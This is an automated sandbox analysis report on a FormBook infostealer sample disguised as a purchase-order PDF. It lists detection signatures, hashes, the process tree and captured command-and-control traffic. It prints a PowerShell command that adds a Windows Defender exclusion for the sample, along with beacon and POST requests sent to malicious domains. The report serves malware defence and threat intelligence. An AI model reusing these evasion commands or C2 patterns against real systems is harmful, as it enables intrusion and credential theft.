Windows Analysis Report
New PO [FK4-7173].pdf.exe

Overview

General Information

Sample name: New PO [FK4-7173].pdf.exe
Analysis ID: 1552610
MD5: f946f99df4c8406ba19b70561c1d53f6
SHA1: fdce6ff15295a31ff37c517b90f466e37e272cfd
SHA256: bcd2af5fd6fdac5f0bdfcc38acbaa7d941a30cc75004c1f10731d6ad9efa7632
Tags: exe, user-threatcat_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses shutdown.exe to shutdown or reboot the system
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • New PO [FK4-7173].pdf.exe (PID: 5592 cmdline: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe" MD5: F946F99DF4C8406BA19B70561C1D53F6)
    • powershell.exe (PID: 6564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • New PO [FK4-7173].pdf.exe (PID: 5316 cmdline: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe" MD5: F946F99DF4C8406BA19B70561C1D53F6)
      • MKVNVRSuoK.exe (PID: 1568 cmdline: "C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • shutdown.exe (PID: 5332 cmdline: "C:\Windows\SysWOW64\shutdown.exe" MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
          • MKVNVRSuoK.exe (PID: 3660 cmdline: "C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5748 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.New PO [FK4-7173].pdf.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine|base64offset|contains: <, Image: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, NewProcessName: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, OriginalFileName: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ProcessId: 5592, ProcessName: New PO [FK4-7173].pdf.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ParentImage: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, ParentProcessId: 5592, ParentProcessName: New PO [FK4-7173].pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ProcessId: 6564, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ParentImage: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe, ParentProcessId: 5592, ParentProcessName: New PO [FK4-7173].pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe", ProcessId: 6564, ProcessName: powershell.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-11-09T05:35:14.821461+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49709 | TCP
                2024-11-09T05:35:53.868488+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.5 | 49910 | TCP

                AV Detection

                Source: New PO [FK4-7173].pdf.exeAvira: detected
                Source: New PO [FK4-7173].pdf.exeReversingLabs: Detection: 52%
                Source: New PO [FK4-7173].pdf.exeVirustotal: Detection: 33%
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.New PO [FK4-7173].pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2215511334.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473043589.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4472088582.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4475014817.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2238337409.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4473189897.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4473138354.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2221565153.00000000015F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: New PO [FK4-7173].pdf.exeJoe Sandbox ML: detected
                Source: New PO [FK4-7173].pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New PO [FK4-7173].pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MKVNVRSuoK.exe, 00000006.00000002.4472639684.0000000000FEE000.00000002.00000001.01000000.0000000C.sdmp, MKVNVRSuoK.exe, 00000009.00000002.4472854641.0000000000FEE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.00000000030DE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2220089885.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2215761146.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shutdown.pdbGCTL source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000002.4472730066.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New PO [FK4-7173].pdf.exe, New PO [FK4-7173].pdf.exe, 00000004.00000002.2217527999.0000000001100000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 00000007.00000002.4473382141.00000000030DE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2220089885.0000000002D94000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 00000007.00000002.4473382141.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 00000007.00000003.2215761146.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shutdown.pdb source: New PO [FK4-7173].pdf.exe, 00000004.00000002.2216024662.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, MKVNVRSuoK.exe, 00000006.00000002.4472730066.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026DC700 FindFirstFileW,FindNextFileW,FindClose,7_2_026DC700
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4x nop then jmp 0513B017h0_2_0513A5C4
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4x nop then jmp 0513B017h0_2_0513A9E5
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then xor eax, eax7_2_026C9E20
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then pop edi7_2_026CE336
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then mov ebx, 00000004h7_2_02DD04E8

                Networking

                Source: DNS query: www.maviro.xyz
                Source: Joe Sandbox ViewIP Address: 217.160.0.220 217.160.0.220
                Source: Joe Sandbox ViewIP Address: 67.223.117.142 67.223.117.142
                Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49709
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.5:49910
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /2t4j/?J8LHgDJp=76BBSHLebMFInx415ME5nsaWAX7vqpkDMKUIFXyWJTjkcZQycFcIpYDenhjJ2rT89sPaLHitdl181guZmt6MFlr0ftv27uO4BWOF65kRMGEDoBp+CAe+LLLR26U78pjUdQ==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.tubetrexhd.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /t61z/?J8LHgDJp=QbhiOx00h/rFbDhCzcx72F6h1mdg1yJMVj9Qvc8sejmtB5T8qlwycmwhvDAYX2QAFqqRkYoUzkyWExrL+4KEHOogqLXxPl8o8avUe8e/R2yv7tJPERVtmQXUL45HQRgD9g==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.moneta.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n1dp/?J8LHgDJp=ryeBbJYUvalC4Gf2UXy7Qc/r17vTzADlU+kriaheCGn+31zAxY9EcJfSGqt2t+ma9yg9hIhC3ppYERZTlK/9H+6asqo2CGRUX6V95R7Z3XOuyoyAAN44PtQ+X9f95w6KKw==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.mjmegartravel.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /q6od/?J8LHgDJp=LfsI10JCm28n9wRtu+WKZQZOOeP2R4+f5k1rV9zDAVl7gnOY+STnccMWAxzuycS6lIdYQVNguf/7P6n2dnZScMvaSF16brm/Uh4MwjbERtDYretDLoFMjBxL8OHqrNB6Qw==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.digitaladpro.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ylto/?J8LHgDJp=uYv4kBsD3a2LIu39RI2EN5QaJ/QGWlTF0j2ZxsKcJFSdquhIvwsPj5Km9wQw9lg3VAI27qB+9KUHV5rrvR7hLmJ3jtEB7TDQFLuda37LuGp+gEzOJmBCc5BPpe4hsE5s8g==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.omnibizlux.bizAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fdhm/?J8LHgDJp=LvSy2RgWDp4XGg9UUwSL95nwMTpQ1E5XJngg5CsNqq22kikTstX/mPq/7EMqvdfjgfwUWsD0UoRe2cy8XzVdEttk7M0krM2NWyLTMEkrELr+3VPpc3E0q8VpqI+fnYrBcQ==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.energyparks.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ+q7gdvT6YSgAnJN3Ii+ka2zR4pFTGuYtard36/gOxMLoedf5n7SHRQ/SfZ0+VwBsW9Pxqn6Ah8T9/ZStSyIEzKK6cN23N3L3zzTI9ofHg==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.estrela-b.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2493/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=jH4Cb08gek16/2FqI6arh4PQxRW9qayf8vOptAV1ciloHQcwXJuEWMhJ8+kmyy6nu0+F87CgCWTPmYOVFW7qHeowlszl5iXL8EHw53KjcBxSho9HkZ7HZn7te055AXvZAw== HTTP/1.1Host: www.winspinoffr.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /hcih/?J8LHgDJp=4I/0J6YfWYwRno7rH0k2bI6cVdalKpPNFcVIT9hZ02dsPRsaZO23kVRDbCaRJTowDBACcCwGuYsZ/ib1kw640ghKfTJpeVfXv/8QQFzliEtlwJs4R/u7+hsr/ZpE446a8w==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.maviro.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /21bn/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=LUH9mU7gyodu165Py4LvPMqvM6tVT1yZnoho0cb8kzCV8K1cnf0TlkgJLscSA+u/wE57w1zHLj7MmynPemRfd+7x471fFzVs5Vj8lBvl1x4666HrkdrwF1YQmmc6Rlfi/w== HTTP/1.1Host: www.thefokusdong43.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9lti/?J8LHgDJp=geiaNc/IHvVr1XtPIeaNP3WF7XhVraHppqovBYUyzl5ecV5+b9ApcmryUDB5zfHGxHwTi5lfOLOrSi1EPqCbf0z3Xdxd0TcO0Ng9DzbN/wxAK8CjGZPvJp4ddlq6R6JTvg==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.7fh27o.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /42c3/?J8LHgDJp=JBDdfBWF/aARUf0PyG02RiIz2qli5PW+5nwTlGpfB1DrZY6QfIB5cxII436r+j2NvU2wp2AeqQG6cs1IYMUL87i7oiU5+htQ/rMuVW1JPNoYDo0Ha8BBXEhHg5ia/a4jMw==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.eyecatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fjmy/?J8LHgDJp=c5JK8yKqbpJXnVX35yNvpk4it4zCfLCuqqKaPXgDxgb5kUsYKBWi9fZhBVM/jAdIGDw0KxxisAN8tQ7jqzqBhav6DGIeWiTI6vrrd/bXxPUrtdAQLIqbusoQJp9p3rxIBg==&aF=JLp4o0Qx2F-p4F HTTP/1.1Host: www.t95yd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /xlhb/?aF=JLp4o0Qx2F-p4F&J8LHgDJp=WDmEkFMJCPM0vAdoEgsDaI2zUw+I3BUP6f65xhueHOQTowQnu/4Hj56WOua05lBgvGSvVDcmYnsn0HKnK8OdiO87PbUZXBqH6/yEH6S1yhxHCm7aRAizBR0GDl9YCJCE3A== HTTP/1.1Host: www.sonoscan.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.tubetrexhd.buzz
                Source: global trafficDNS traffic detected: DNS query: www.rka6460.online
                Source: global trafficDNS traffic detected: DNS query: www.moneta.life
                Source: global trafficDNS traffic detected: DNS query: www.mjmegartravel.online
                Source: global trafficDNS traffic detected: DNS query: www.digitaladpro.shop
                Source: global trafficDNS traffic detected: DNS query: www.omnibizlux.biz
                Source: global trafficDNS traffic detected: DNS query: www.energyparks.net
                Source: global trafficDNS traffic detected: DNS query: www.estrela-b.online
                Source: global trafficDNS traffic detected: DNS query: www.winspinoffr.pro
                Source: global trafficDNS traffic detected: DNS query: www.maviro.xyz
                Source: global trafficDNS traffic detected: DNS query: www.thefokusdong43.click
                Source: global trafficDNS traffic detected: DNS query: www.7fh27o.vip
                Source: global trafficDNS traffic detected: DNS query: www.eyecatch.pro
                Source: global trafficDNS traffic detected: DNS query: www.t95yd.top
                Source: global trafficDNS traffic detected: DNS query: www.sonoscan.org
                Source: global trafficDNS traffic detected: DNS query: www.jllllbx.top
                Source: unknownHTTP traffic detected: POST /t61z/ HTTP/1.1Host: www.moneta.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Length: 209Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeOrigin: http://www.moneta.lifeReferer: http://www.moneta.life/t61z/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 4a 38 4c 48 67 44 4a 70 3d 64 5a 4a 43 4e 47 39 58 6a 37 44 76 41 69 39 65 6a 70 49 6b 7a 47 48 59 77 68 39 59 35 44 6c 42 56 44 4a 53 6b 62 6f 49 63 68 32 69 42 4e 4c 2f 6b 43 34 65 43 32 73 68 78 51 4d 56 41 6b 39 4c 50 36 4f 49 37 4c 63 6a 6b 69 36 4b 45 32 66 31 32 4b 4f 51 4c 39 45 70 33 64 48 53 41 46 52 36 7a 59 6a 53 57 4e 62 78 50 46 4b 7a 30 66 4a 48 65 68 41 72 71 51 4c 51 62 71 68 54 51 68 46 68 72 31 76 66 2b 39 63 63 38 75 53 2b 6f 35 4e 49 79 6d 50 6c 47 4b 53 4e 44 58 7a 48 4b 50 52 74 4c 47 4a 62 2f 67 79 32 55 68 36 66 72 4d 47 75 65 2f 74 64 41 79 38 38 4f 31 51 68 38 39 4f 6c 48 67 42 35 68 69 6f 3d Data Ascii: J8LHgDJp=dZJCNG9Xj7DvAi9ejpIkzGHYwh9Y5DlBVDJSkboIch2iBNL/kC4eC2shxQMVAk9LP6OI7Lcjki6KE2f12KOQL9Ep3dHSAFR6zYjSWNbxPFKz0fJHehArqQLQbqhTQhFhr1vf+9cc8uS+o5NIymPlGKSNDXzHKPRtLGJb/gy2Uh6frMGue/tdAy88O1Qh89OlHgB5hio=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 09 Nov 2024 04:36:20 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 